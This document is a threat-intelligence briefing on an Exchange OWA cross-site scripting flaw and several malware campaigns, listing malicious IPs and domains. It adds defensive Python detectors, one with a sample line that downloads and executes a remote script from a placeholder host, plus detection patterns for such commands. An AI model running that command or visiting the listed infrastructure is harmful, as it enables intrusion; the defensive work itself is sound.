This briefing covers threat intelligence for May 15, 2026. The primary focus is on active malware distribution infrastructure and a critical vulnerability in Microsoft Exchange Server. A significant volume of malicious URLs was identified distributing diverse malware families, including Amadey, Stealc, Formbook, RemusStealer, the Mozi botnet, and ClearFake campaign infrastructure. The KEV catalog added CVE-2026-42897, a cross-site scripting vulnerability in Microsoft Exchange Server Outlook Web Access that allows arbitrary JavaScript execution under specific interaction conditions.
The malware distribution activity demonstrates sophisticated infrastructure: multiple C2 monitoring systems, dropper chains, and targeting across Windows, Linux, macOS, and IoT devices. Notable patterns include Amadey dropper campaigns delivering secondary payloads, the Mozi botnet targeting IoT devices via shell scripts, and ClearFake campaigns using deceptive domains. Organizations should prioritize patching the Exchange Server vulnerability and implementing URL filtering for the identified malicious infrastructure.
The threat landscape shows continued reliance on compromised legitimate infrastructure, file-sharing services (Mega.nz), and temporary hosting platforms for malware distribution. Detection opportunities exist at network perimeters through URL filtering and at endpoints through behavioral analysis of dropper chains and scripting interpreter abuse.
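One way to act on the URL-filtering recommendation, as an added example that is not part of the original briefing: a small matcher that normalizes the host out of each proxy-log URL and checks it against the IP addresses and domains named in this briefing, treating subdomains of a listed domain as hits and anything that merely begins with a listed name as a miss. The indicator list is taken from the text of the briefing; the log format and the log lines themselves are constructed for illustration.

```python
"""Match proxy-log URLs against the network indicators named in this briefing.

Added example, not part of the original briefing. INDICATORS is copied from
the briefing text; the proxy log lines are constructed samples.
"""
import ipaddress
from urllib.parse import urlsplit

# Indicators named in the briefing, labelled with the campaign they were reported under.
INDICATORS = {
    "91.92.242.236": "Amadey/Stealc dropper chain",
    "45.156.87.31": "multi-architecture IoT payload host",
    "fiinterchillers.com": "Formbook (compromised WordPress)",
    "endpoint-api-node.com": "macOS campaign",
    "download-api-endpoint.com": "macOS campaign",
    "toolkeep.org": "password-protected ZIP lure",
}


def normalize_host(url):
    """Return a comparable host: lowercase, no port, no trailing dot, no IPv6 brackets."""
    if "://" not in url:
        url = "http://" + url  # bare host:port, as logged for CONNECT tunnels
    host = urlsplit(url).hostname  # .hostname lowercases and strips the port/brackets
    if not host:
        return None
    return host.rstrip(".")


def match_indicator(host):
    """Return (indicator, label) if host is an IoC or a subdomain of one, else None."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        label = INDICATORS.get(str(ip))  # str() canonicalizes e.g. IPv6 spelling
        return (str(ip), label) if label else None
    labels = host.split(".")
    # Walk from the full host up to its parents (stopping short of the bare TLD)
    # so cdn.listed.example matches listed.example but listed.example.evil does not.
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in INDICATORS:
            return (candidate, INDICATORS[candidate])
    return None


def scan_proxy_log(lines):
    """Parse constructed 'timestamp client method url status' records and return hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed record; count these separately in production
        ts, client, url = parts[0], parts[1], parts[3]
        host = normalize_host(url)
        if not host:
            continue
        found = match_indicator(host)
        if found:
            hits.append({"time": ts, "client": client, "host": host,
                         "indicator": found[0], "label": found[1]})
    return hits


# Constructed sample log: one benign line, three indicator hits with messy spellings,
# and one look-alike that must not match.
SAMPLE_LOG = [
    "2026-05-15T08:01:12Z 10.0.4.21 GET http://www.example.com/index.html 200",
    "2026-05-15T08:02:03Z 10.0.4.21 GET http://91.92.242.236/files/payload.exe 200",
    "2026-05-15T08:02:40Z 10.0.7.9 CONNECT cdn.download-api-endpoint.com:443 200",
    "2026-05-15T08:03:11Z 10.0.2.14 GET https://FIINTERCHILLERS.COM./wp-content/uploads/update.hta 200",
    "2026-05-15T08:04:55Z 10.0.2.14 GET http://toolkeep.org.lookalike.example/x 404",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} -> {hit['host']} [{hit['label']}]")
```

The normalization step matters more than the lookup: mixed case, a trailing dot, an explicit port, or a CONNECT record without a scheme are all ordinary in proxy logs and each would silently defeat a naive string comparison.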
CISA added one critical vulnerability to the Known Exploited Vulnerabilities catalog affecting Microsoft Exchange Server.
Microsoft Exchange Server contains a cross-site scripting vulnerability in Outlook Web Access that allows arbitrary JavaScript execution in the browser context when specific interaction conditions are met. Its addition to the KEV catalog indicates active exploitation in the wild.
47 malicious URLs were identified distributing multiple malware families, including stealers, droppers, botnets, and remote access tools, across Windows, Linux, macOS, and IoT platforms.
Multiple URLs are distributing Amadey dropper malware backed by active C2 monitoring infrastructure. Amadey serves as an initial access vector that delivers secondary payloads, including the Stealc information stealer. Distribution is via compromised infrastructure and temporary file hosting services.
The Stealc stealer is being distributed via Amadey dropper chains from IP 91.92.242.236. Multiple file payloads were identified with C2 monitoring active, indicating credential and data theft capabilities.
The Formbook infostealer is distributed via malicious HTA files and PNG-disguised executables. It uses compromised WordPress infrastructure (fiinterchillers.com) and dynamic DNS hosting for C2 communications.
Multiple shell script payloads are targeting MIPS-architecture IoT devices. Distribution from multiple IP addresses indicates an active botnet recruitment phase. Mozi targets unpatched routers and IoT devices for DDoS and cryptomining operations.
A RemusStealer campaign is dropping the Phorpiex worm as a secondary payload via compromised WordPress infrastructure, demonstrating a multi-stage infection in which information stealing is followed by worm propagation.
A PowerShell-based fileless loader campaign is specifically targeting Brazilian users. It delivers a stealer payload without writing traditional executables to disk, complicating detection by traditional antivirus.
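A fileless loader leaves little for a file scanner, but the interpreter launch itself is visible in process-creation telemetry. As an added example that is not from the briefing, the routine below triages such events: it decodes `-EncodedCommand` arguments (base64 over UTF-16LE, which is how PowerShell expects them), then scores each launch on stealth switches, in-memory download-and-execute tokens, and a document or script-host parent. The pipe-delimited event layout and the events are constructed; the fields correspond to what Sysmon Event ID 1 or an EDR process event would carry.

```python
"""Triage PowerShell launches for encoded / fileless loader behaviour.

Added example, not from the briefing. Event records are constructed samples in a
simplified 'ts|host|parent|image|commandline' layout; adapt the split to your telemetry.
"""
import base64
import re

# powershell.exe accepts abbreviated switches; -EncodedCommand is commonly seen as -e/-ec/-enc.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Switches that hide the window or skip profile/policy; benign admin scripts rarely need all of them.
HIDDEN_FLAGS = re.compile(
    r"(?i)-(?:w|win|window|windowstyle)\s+hidden|-nop\b|-noprofile\b|-noni\b"
    r"|-noninteractive\b|-ep\s+bypass|-executionpolicy\s+bypass")
# Tokens indicating in-memory execution of remotely fetched content.
SUSPICIOUS_TOKENS = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|frombase64string"
    r"|net\.webclient|invoke-webrequest|invoke-restmethod|irm|iwr)\b")
# Parents that should not normally be spawning an interpreter.
DOCUMENT_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_event(event):
    """Return (score, reasons) for one 'ts|host|parent|image|commandline' record."""
    _ts, _host, parent, image, cmdline = event.split("|", 4)
    reasons = []
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    if HIDDEN_FLAGS.search(cmdline):
        reasons.append("stealth switches")
    decoded = decode_encoded_command(cmdline)
    body = cmdline
    if decoded is not None:
        reasons.append("encoded command")
        body = decoded  # inspect the decoded script, not the base64 blob
    if SUSPICIOUS_TOKENS.search(body):
        reasons.append("in-memory download/execute")
    if parent.lower().endswith(DOCUMENT_PARENTS):
        reasons.append("launched from document/script host")
    return len(reasons), reasons


def triage(events):
    """Score every event and return (score, reasons, commandline) for hits, highest first."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score:
            findings.append((score, reasons, ev.split("|", 4)[4]))
    return sorted(findings, key=lambda f: f[0], reverse=True)


# Constructed sample: the encoded payload is built here so the base64 is valid;
# the URL is a placeholder, not an indicator from the briefing.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.txt')"
ENCODED_SAMPLE = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    r"2026-05-15T13:02:11Z|WS-BR-014|explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem C:\Temp",
    r"2026-05-15T13:04:37Z|WS-BR-014|mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE,
    r"2026-05-15T13:05:02Z|WS-BR-014|cmd.exe|C:\Program Files\PowerShell\7\pwsh.exe|pwsh.exe -NoProfile -Command Invoke-WebRequest https://intranet.example/update.txt",
    r"2026-05-15T13:05:40Z|WS-BR-014|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami",
]

if __name__ == "__main__":
    for score, reasons, cmd in triage(SAMPLE_EVENTS):
        print(f"score={score} {reasons}\n    {cmd[:100]}")
```

Scoring rather than single-pattern alerting is deliberate: `-NoProfile` alone or a single `Invoke-WebRequest` is common in legitimate automation, whereas a hidden window plus an encoded script that downloads and executes, spawned from a script host, is almost never benign. Feed the decoded script into the same rules as the clear-text command line, or the encoding hides everything.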
Three malicious domains were identified hosting ClearFake campaign payloads, using deceptive names that mimic legitimate services. ClearFake typically delivers browser-based social engineering attacks and drive-by downloads.
Extensive malware distribution infrastructure at IP 45.156.87.31 hosts payloads for multiple processor architectures (ARM4-7, MIPS, x86, SH4, PPC), indicating an IoT botnet recruitment campaign targeting diverse embedded systems and routers.
Malicious URLs are specifically targeting macOS systems via the endpoint-api-node.com and download-api-endpoint.com infrastructure, indicating cross-platform threat actor operations expanding beyond traditional Windows targets.
Malware is being distributed via password-protected ZIP archives hosted on toolkeep.org and masquerading as legitimate software (Wondershare Filmora). The password protection is used to evade email security gateways and sandbox analysis.
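Because the password defeats content scanning, the gateway-side check has to be on the container rather than the payload, and ZIP helps here: entry names and flags remain in cleartext even when the data is encrypted. The following is an added example, not from the briefing, that reads the central directory directly and quarantines archives whose encrypted entries carry an executable or script extension. The archives are constructed in memory as test fixtures (the encryption flag is set but the bytes are not actually encrypted, since only headers are inspected), and the installer file name echoes the lure described above purely as a label.

```python
"""Flag password-protected ZIP attachments at the mail gateway.

Added example, not part of the original briefing. The archives below are
constructed in memory; no real sample is used.
"""
import struct
import zlib

# Record signatures and general-purpose flag bits from the ZIP APPNOTE specification.
LOCAL_HEADER_SIG = b"PK\x03\x04"
CENTRAL_HEADER_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"
FLAG_ENCRYPTED = 0x0001          # bit 0: traditional (ZipCrypto) encryption
FLAG_STRONG_ENCRYPTION = 0x0040  # bit 6: strong encryption (e.g. AES via extra field)

CENTRAL_HEADER_FMT = "<4s6H3I5H2I"  # 46-byte central directory file header
EOCD_FMT = "<4s4H2IH"               # 22-byte end-of-central-directory record

# Entry types that have no business arriving inside an encrypted archive.
RISKY_EXTENSIONS = {"exe", "scr", "dll", "msi", "js", "jse", "vbs", "wsf",
                    "hta", "ps1", "bat", "cmd", "lnk", "iso", "img"}


def build_zip(entries):
    """Constructed fixture: a single-disk STORED-method ZIP from (name, data, flags) tuples.

    Entries carrying FLAG_ENCRYPTED are only *flagged* as encrypted; the bytes are
    left untouched because the detector reads headers only, which is all a gateway
    can do without the password.
    """
    local_parts, central_parts, offset = [], [], 0
    for name, data, flags in entries:
        name_b = name.encode("utf-8")
        crc = zlib.crc32(data) & 0xFFFFFFFF
        local = (LOCAL_HEADER_SIG
                 + struct.pack("<5H3I2H", 20, flags, 0, 0, 0, crc, len(data), len(data), len(name_b), 0)
                 + name_b + data)
        central = (CENTRAL_HEADER_SIG
                   + struct.pack("<6H3I5H2I", 20, 20, flags, 0, 0, 0, crc, len(data), len(data),
                                 len(name_b), 0, 0, 0, 0, 0, offset)
                   + name_b)
        local_parts.append(local)
        central_parts.append(central)
        offset += len(local)
    central_dir = b"".join(central_parts)
    eocd = EOCD_SIG + struct.pack("<4H2IH", 0, 0, len(entries), len(entries), len(central_dir), offset, 0)
    return b"".join(local_parts) + central_dir + eocd


def iter_central_entries(blob):
    """Yield (name, flags, method) per entry from the central directory.

    The central directory is authoritative for sizes even when local headers defer
    them to data descriptors. Single-disk, non-Zip64 archives only; a crafted
    archive comment could contain the EOCD signature, so production code should
    validate harder than this.
    """
    eocd_at = blob.rfind(EOCD_SIG)
    if eocd_at < 0 or eocd_at + struct.calcsize(EOCD_FMT) > len(blob):
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, cd_size, cd_offset, _ = struct.unpack_from(EOCD_FMT, blob, eocd_at)
    if cd_offset + cd_size != eocd_at:
        raise ValueError("central directory does not end at EOCD record")
    pos = cd_offset
    for _ in range(total):
        fields = struct.unpack_from(CENTRAL_HEADER_FMT, blob, pos)
        if fields[0] != CENTRAL_HEADER_SIG:
            raise ValueError("bad central directory header")
        flags, method = fields[3], fields[4]
        name_len, extra_len, comment_len = fields[10], fields[11], fields[12]
        start = pos + struct.calcsize(CENTRAL_HEADER_FMT)
        yield blob[start:start + name_len].decode("utf-8", "replace"), flags, method
        pos = start + name_len + extra_len + comment_len


def encrypted_entries(blob):
    """Names of entries whose flags mark them encrypted; names stay readable in ZIP."""
    return [name for name, flags, _ in iter_central_entries(blob)
            if flags & (FLAG_ENCRYPTED | FLAG_STRONG_ENCRYPTION)]


def classify_attachment(blob):
    """Gateway verdict: 'not-zip', 'clean', 'review' (encrypted, no executable) or 'quarantine'."""
    if EOCD_SIG not in blob:
        return "not-zip"
    hidden = encrypted_entries(blob)
    if not hidden:
        return "clean"
    exts = {n.lower().rsplit(".", 1)[-1] for n in hidden if "." in n}
    return "quarantine" if exts & RISKY_EXTENSIONS else "review"


# Constructed fixtures: the installer name mirrors the lure described in the briefing.
LOCKED_INSTALLER = build_zip([("Wondershare_Filmora_Setup.exe", b"MZ" + b"\x00" * 62, FLAG_ENCRYPTED)])
LOCKED_DOCUMENT = build_zip([("invoice.pdf", b"%PDF-1.7 constructed", FLAG_ENCRYPTED)])
PLAIN_ARCHIVE = build_zip([("notes.txt", b"hello", 0), ("report.pdf", b"%PDF-1.7 constructed", 0)])

if __name__ == "__main__":
    for label, blob in [("locked installer", LOCKED_INSTALLER),
                        ("locked document", LOCKED_DOCUMENT), ("plain", PLAIN_ARCHIVE)]:
        print(f"{label:16} -> {classify_attachment(blob)} {encrypted_entries(blob)}")
```

The same flags are exposed by the standard library as `zipfile.ZipInfo.flag_bits` for files on disk; parsing the directory by hand is shown here so the check does not depend on a library tolerating a deliberately malformed archive. Pair the verdict with the sender and the lure name, since a locked archive that calls itself a commercial installer is the combination the briefing describes.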
Analysis of malware distribution methods and infection chains reveals common TTPs across multiple threat actors.
Multiple campaigns employ multi-stage dropper chains with active C2 monitoring tags. Amadey serves as a first-stage loader delivering secondary payloads, including Stealc, which enables modular payload delivery and complicates attribution.
Threat actors are leveraging compromised WordPress sites and other legitimate web infrastructure for malware distribution; the borrowed reputation helps evade URL reputation filtering and increases victim trust during social engineering.
Simultaneous campaigns targeting Windows, Linux, macOS, and diverse IoT architectures indicate sophisticated threat actor capabilities and infrastructure. Shell script payloads targeting MIPS and ARM processors demonstrate a focus on router and embedded device compromise.
These briefings are compiled from publicly available threat-intelligence feeds, which may include CISA KEV, NIST NVD, the GitHub Advisory Database (OSV), abuse.ch, and Wordfence Intelligence. Data-breach and credential-leak items may include data from Have I Been Pwned and ransomware.live.
CVE® is a registered trademark of The MITRE Corporation. CVE Records are © The MITRE Corporation, reproduced under the CVE Program Terms of Use. WordPress vulnerability data is provided by Wordfence Intelligence, © Defiant, Inc. Breach data from Have I Been Pwned is licensed under CC BY 4.0.